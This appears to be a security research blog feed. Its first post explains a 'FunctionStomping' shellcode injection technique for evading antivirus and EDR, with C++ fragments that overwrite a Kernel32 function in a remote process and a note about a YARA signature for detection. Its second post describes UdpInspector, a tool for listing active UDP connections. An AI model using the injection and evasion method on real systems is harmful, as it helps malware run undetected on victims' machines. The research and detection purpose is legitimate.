Most other injection methods have something in common: they use VirtualAllocEx to allocate new space within the process. ModuleStomping does something entirely different: instead of allocating new space in the process, it stomps an existing module with the malicious code.

After I saw that I started to think: How can I use that to make an even more evasive change that won’t trigger the AV/EDR or won’t be found by the injection scanner?

The answer was pretty simple: Stomp a single function! At the time I thought it would be a matter of hours to make this work, but it took me a little while to solve all the problems.

What does a simple injection look like

The general purpose of any injection is to evade anti-viruses and EDRs and be able to deliver or execute malware.

For all of the injection methods, you need to open a process with the PROCESS_ALL_ACCESS permission (or a combination of permissions that allows you to spawn a thread and to write and read the process’ memory), since the injector needs to perform high-privilege operations such as writing to the memory of the process and executing the shellcode remotely. To be able to get PROCESS_ALL_ACCESS, one of the following must hold: the injected process runs under your user’s context, you have a high-privileged user running in a high-privileged context (you can read more about UAC and what low-privileged and high-privileged admins are in MSDN), or the injected process is one that you spawned from your own process and therefore have full access to.

After we obtain a valid handle with the right permissions we need to allocate space for the shellcode within the remote process’ virtual memory with VirtualAllocEx. That gives us the space and the address we need for the shellcode to be written. After we have a page with the right permissions and enough space, we can use WriteProcessMemory to write the shellcode into the remote process.

Now, all that’s left to do is to call CreateRemoteThread with the shellcode’s address (that we got from the VirtualAllocEx) to spawn our shellcode in the other process.

To summarize:

shellcode_injection

Research - How and why FunctionStomping works?

For the sake of the POC, I chose to target User32.dll and MessageBoxW. But, unlike the regular way of using GetModuleHandle, I needed to do it remotely. For that, I used the EnumProcessModules function:

enum_process_modules

It looks like a very straightforward function, and now all I needed to do was use the good old GetProcAddress. The implementation was pretty simple: use GetModuleFileNameEx to get the module’s name out of the handle and then check whether it is the module we seek (currently User32.dll). If it is, just use GetProcAddress and get the function’s base address.

// Getting the module name.
if (GetModuleFileNameEx(procHandle, currentModule, currentModuleName, MAX_PATH - sizeof(wchar_t)) == 0) {
    std::cerr << "[-] Failed to get module name: " << GetLastError() << std::endl;
    continue;
}

// Checking if it is the module we seek.
if (StrStrI(currentModuleName, moduleName) != NULL) {

    functionBase = (BYTE*)GetProcAddress(currentModule, functionName);
    break;
}

But it didn’t work. I sat by the computer for a while, staring at the valid module handle I got and couldn’t figure out why I could not get the function pointer. At this point, I went back to MSDN and read again the description, and one thing caught my eye:

module_permissions

Well… That explains some things. I searched more about this permission and found this explanation:

load_library_as_datafile

That was very helpful to me because at this moment I knew why even when I have a valid handle, I cannot use GetProcAddress! I decided to change User32.dll and MessageBoxW to other modules and functions: Kernel32.dll and CreateFileW.

If you are wondering why Kernel32.dll and not another DLL, the reason is that Kernel32.dll is loaded into virtually every user-mode process (you can read more about it in the great Windows Internals books) and is therefore a reliable target.

And now all that’s left is to write the POC.

POC Development - Final stages

The final step is similar to any other injection method but with one significant change: we need to use VirtualProtectEx with the base address of our function. Usually, in injections, we set the address parameter of VirtualAllocEx to NULL and get back the address that is mapped for us, but since we want to overwrite an existing function we need to pass its base address instead. After WriteProcessMemory is executed, the function is successfully stomped!

// Changing the protection to PAGE_READWRITE for the shellcode.
if (!VirtualProtectEx(procHandle, functionBase, sizeToWrite, PAGE_READWRITE, &oldPermissions)) {
    std::cerr << "[-] Failed to change protection: " << GetLastError() << std::endl;
    CloseHandle(procHandle);
    return -1;
}

SIZE_T written;

// Writing the shellcode to the remote address.
if (!WriteProcessMemory(procHandle, functionBase, shellcode, sizeof(shellcode), &written)) {
    std::cerr << "[-] Failed to overwrite function: " << GetLastError() << std::endl;
    VirtualProtectEx(procHandle, functionBase, sizeToWrite, oldPermissions, &oldPermissions);
    CloseHandle(procHandle);
    return -1;
}

At first, I used PAGE_EXECUTE_READWRITE permission to execute the shellcode but it is problematic (Although even with the PAGE_EXECUTE_READWRITE flag anti-viruses and hollows-hunter still failed to detect it - I wanted to use something else).

Because of that, I checked if there is any other permission that can help with what I wanted: To be able to execute the shellcode and still be undetected. You may ask yourself: “Why not just use PAGE_EXECUTE_READ?”

I wanted to create a single POC and be able to execute any kind of shellcode: Whether it writes to itself or not, and I’m proud to say that I found a solution for that.

I researched further about the available page permissions and one caught my eye: PAGE_EXECUTE_WRITECOPY.

page_execute_write_copy

It looks like it gives read, write and execute permissions without actually using PAGE_EXECUTE_READWRITE. I wanted to dig a little deeper into this and found an article by CyberArk that explains more about this permission and it looked like the fitting solution.
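To see how the protection constants relate to each other, the following sketch decodes a protection value into read/write/execute capabilities. The constants mirror the values from winnt.h; PageAccess, Decode, NaiveRwxCheck and IsWritableAndExecutable are hypothetical names, and the naive check is only my assumption about how a simplistic check for writable and executable memory could look, not a description of any specific product.

```cpp
#include <cstdint>

// Page protection constants; the values mirror winnt.h.
constexpr std::uint32_t kPageReadWrite        = 0x04; // PAGE_READWRITE
constexpr std::uint32_t kPageExecuteRead      = 0x20; // PAGE_EXECUTE_READ
constexpr std::uint32_t kPageExecuteReadWrite = 0x40; // PAGE_EXECUTE_READWRITE
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80; // PAGE_EXECUTE_WRITECOPY

struct PageAccess {
    bool read;
    bool write;   // for WRITECOPY the write lands in a private copy of the page
    bool execute;
};

// Maps a single protection constant to the access it grants.
// Unknown values decode to "no access" in this sketch.
constexpr PageAccess Decode(std::uint32_t protection) {
    return protection == kPageReadWrite        ? PageAccess{true, true, false}
         : protection == kPageExecuteRead      ? PageAccess{true, false, true}
         : protection == kPageExecuteReadWrite ? PageAccess{true, true, true}
         : protection == kPageExecuteWriteCopy ? PageAccess{true, true, true}
                                               : PageAccess{false, false, false};
}

// Naive check that only flags the classic RWX constant.
constexpr bool NaiveRwxCheck(std::uint32_t protection) {
    return protection == kPageExecuteReadWrite;
}

// Broader check based on the decoded capabilities.
constexpr bool IsWritableAndExecutable(std::uint32_t protection) {
    return Decode(protection).write && Decode(protection).execute;
}
```

With these definitions, PAGE_EXECUTE_WRITECOPY passes the broader check but not the naive one, which matches the observation that it behaves like read, write and execute without being PAGE_EXECUTE_READWRITE.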

To conclude, the UML of this method looks like this:

function_stomping

Detection

Because many antiviruses failed to identify this shellcode injection technique as malicious, I added a YARA signature I wrote so you can import it into your defense tools.

Acknowledgments

UdpInspector - Getting active UDP connections without sniffing

19 August 2021 at 00:00


Many times I’ve wondered how come there are no tools to get active UDP connections. Of course, you can always sniff with Wireshark or any other tool of your choosing, but why doesn’t Netstat have it built in? That is the point where I went on a quest to investigate the matter. Naturally, I started with MSDN to read more about what I can get about UDP connections, and that is the moment when I found these two functions:

So, I started to look at the struct they return and saw a struct named MIB_UDPTABLE.

udptable

Sadly and unsurprisingly it gave no useful information, but remember this struct - it will be used later. This is when I started to check another path - reverse engineering Netstat.

I will tell you now - it wasn’t helpful at all, but I did learn about a new undocumented function - always good to know! When I opened Netstat I searched for the interesting part: how does it get the UDP connections? Maybe it uses a special function that would help me as well.

netstatudpfunction

After locating the area where it calls to get the UDP connections I saw that weird function: InternalGetUdpTableWithOwnerModule.

InternalGetUdpTableWithOwnerModule

After a quick check on Google, I saw that it wouldn’t help me, as there isn’t much documentation about it. After I realized that, I went back to the source: the GetExtendedUdpTable function.

After rechecking it I found out that it also gives the PIDs of the processes that communicate over UDP. That is the moment when I understood what the first step in solving the problem would be: call GetExtendedUdpTable and then get the socket out of the process. But it wasn’t enough. I needed somehow to iterate over the process’ handles and locate the socket that it holds. After opening Process Explorer I saw something unusual - I expected to see something like \device\udp or \device\tcp but instead I saw a weird \device\afd.

After we duplicate the socket we are one step from the entire solution: what is left is to extract the remote address and port. Confusingly, the function to use is getsockname and not getpeername, although theoretically getpeername should be the one to use.

Summing up, these are the steps that you need to apply to do it:

  • Get all the PIDs that are currently communicating via UDP (via GetExtendedUdpTable)

  • Enumerate the PIDs and extract their handles table (NtQueryInformation, NtQueryObject)

  • Duplicate the handle to the socket (identified with \Device\Afd)

  • Extract from the socket the remote address
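For the first step, each row returned by GetExtendedUdpTable stores the address and the port in network byte order, so they need to be decoded before they can be printed. The sketch below shows only that decoding in portable C++: UdpRow is a hypothetical stand-in for MIB_UDPROW_OWNER_PID, and DecodePort, Octet and Describe are names I made up. It assumes the values are read on a little-endian host such as x86/x64 and does not call any Windows API.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Stand-in for MIB_UDPROW_OWNER_PID; the field order follows the documented
// structure, the type name itself is hypothetical.
struct UdpRow {
    std::uint32_t localAddr; // dwLocalAddr: IPv4 address, network byte order
    std::uint32_t localPort; // dwLocalPort: port in the low 16 bits, network byte order
    std::uint32_t owningPid; // dwOwningPid
};

// Portable equivalent of ntohs() on a little-endian host: swaps the two low bytes.
constexpr std::uint16_t DecodePort(std::uint32_t rawPort) {
    return static_cast<std::uint16_t>(((rawPort & 0xFF) << 8) | ((rawPort >> 8) & 0xFF));
}

// Returns octet `index` (0 = first) of an address stored in network byte
// order, as read by a little-endian host.
inline std::uint8_t Octet(std::uint32_t rawAddr, unsigned index) {
    assert(index < 4);
    return static_cast<std::uint8_t>((rawAddr >> (8 * index)) & 0xFF);
}

// Formats a row as "a.b.c.d:port (pid N)".
inline std::string Describe(const UdpRow& row) {
    std::string text;
    for (unsigned i = 0; i < 4; ++i) {
        if (i != 0) {
            text += '.';
        }
        text += std::to_string(Octet(row.localAddr, i));
    }
    text += ':';
    text += std::to_string(DecodePort(row.localPort));
    text += " (pid " + std::to_string(row.owningPid) + ")";
    return text;
}
```

The PID from each row is what feeds the next steps: it tells you which process to open in order to enumerate its handles and look for the \Device\Afd socket.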
